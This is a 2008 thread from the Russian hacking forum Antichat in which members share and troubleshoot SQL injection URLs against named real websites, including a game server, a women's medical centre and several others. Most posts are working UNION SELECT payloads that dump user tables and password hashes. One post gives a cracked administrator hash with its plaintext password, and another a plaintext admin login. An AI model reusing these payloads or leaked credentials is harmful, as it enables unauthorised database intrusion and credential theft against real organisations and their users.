Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2008, 02:30
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
16.06.2008, 03:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+0,1/*
Константинэ... только не ругай меня... 
P.S Не могу уснуть...
Последний раз редактировалось Ch3ck; 16.06.2008 в 03:15..
|
|
|
|
16.06.2008, 06:50
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
JoN.SmiT не падай в минуса..) читай ману.
еще чтот разкрутил..
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.be_users/*
administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.fe_users/*
administrator;password
Есть скуля в поле login, как получить аутпут?)
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default
Последний раз редактировалось sabe; 16.06.2008 в 07:08..
|
|
|
|
16.06.2008, 07:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
- здесь 1 колонка
http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
Query failed: The used SELECT statements have a different number of columns
- в чем проблема? В неправильных количествах колонок? Их всего одна
Хм..странно.
Вот тут все нормально сработало:
http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*
Последний раз редактировалось Ershik; 16.06.2008 в 07:27..
|
|
|
|
16.06.2008, 07:30
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
в общем есть скуль:
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/*
но при попытке просмотра таблицы
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю... |
|
|
|
16.06.2008, 07:44
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
gisTy
очень интересно... о чем пишет данная ошибка.. а так хз. пробвал конверт. тоже самое
|
|
|
|
16.06.2008, 08:46
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 gisTy таблица пустая:
_http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*
|
|
|
|
16.06.2008, 08:46
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.
Записей в ней нет.
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA .TABLES/*
Хотя можно посмотреть и так.
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn. user/*
Если бы небыло прав, то показало бы ошибку.
Последний раз редактировалось z3r0cool; 16.06.2008 в 08:49..
|
|
|
|
16.06.2008, 11:36
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033
Последний раз редактировалось 0nep@t0p; 16.06.2008 в 11:39..
|
|
|
|
16.06.2008, 12:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понял, спасибо.
Я хочу вытащить с помощью игьекции хеши из форума phpbb2.
Они вместе в одной базе данных.
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
Ошибка получения информации из базы данных.Table 'gelezo2.phpbb_users' doesn't exist
Как действовать в этом случае? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
